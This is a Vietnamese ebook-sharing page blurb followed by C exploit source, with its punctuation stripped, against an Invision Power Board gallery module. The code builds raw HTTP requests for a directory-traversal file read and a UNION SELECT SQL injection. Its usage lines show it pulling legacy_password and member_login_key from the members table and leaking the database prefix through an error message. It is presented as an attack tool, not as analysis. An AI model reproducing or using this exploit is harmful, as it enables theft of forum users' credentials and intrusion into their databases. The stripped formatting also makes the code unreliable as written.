Tham khảo tài liệu 'hacker professional ebook part 380', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | printf column - ipb members column to get. for example ip_adress email. n printf table - ipb table to use. f0r example member n printf prefix - database prefix. n printf - examples n printf sqlinject legacy_password ibf_ members 1 n printf sqlinject member_login_key ibf_ members 1 n printf sqlinject forum ip_adress ibf_ member 5 n n return 1 --- readfile exploit --- char mode argv 1 char exploit 1024 if strcmp mode readfile 0 char type argv 2 char path NULL path argv 4 char localfile argv 5 char host argv 3 if strcmp type 1 0 strcpy exploit GET strcat exploit path strcat exploit act module module gallery cmd viewimage img file_type dir strcat exploit localfile strcat exploit HTTP r nHost strcat exploit host strcat exploit r n r n Exploit exploit readfile host else if strcmp type 2 0 strcpy exploit GET strcat exploit path strcat exploit act gallery code viewimage img dir strcat exploit localfile strcat exploit HTTP r nHost strcat exploit host strcat exploit r n r n Exploit exploit readfile host sql-injection exploit if strcmp mode sqlinject 0 char host argv 2 char path argv 3 char prefix argv 5 char column argv 4 char table argv 6 char id argv 7 strcpy exploit GET strcat exploit path strcat exploit automodule gallery cmd rate img 1 rating 1 album -1 20union 20select 201 strcat exploit column strcat exploit 1 1 1 1 1 1 1 1 20FROM 20 strcat exploit prefix strcat exploit table strcat exploit 20WHERE 20id strcat exploit id strcat exploit 31337 strcat exploit HTTP r nHost strcat exploit host strcat exploit r n r n Exploit exploit sqlinject host if strcmp mode getprefix 0 char path argv 3 char host argv 2 strcpy exploit GET strcat exploit path strcat exploit automodule gallery cmd rate img 1 rating 1 album - 1 20hellknightscrew strcat exploit HTTP r nHost strcat exploit host strcat exploit r n r n printf n n n u can get database prefix from this error. example select FROM .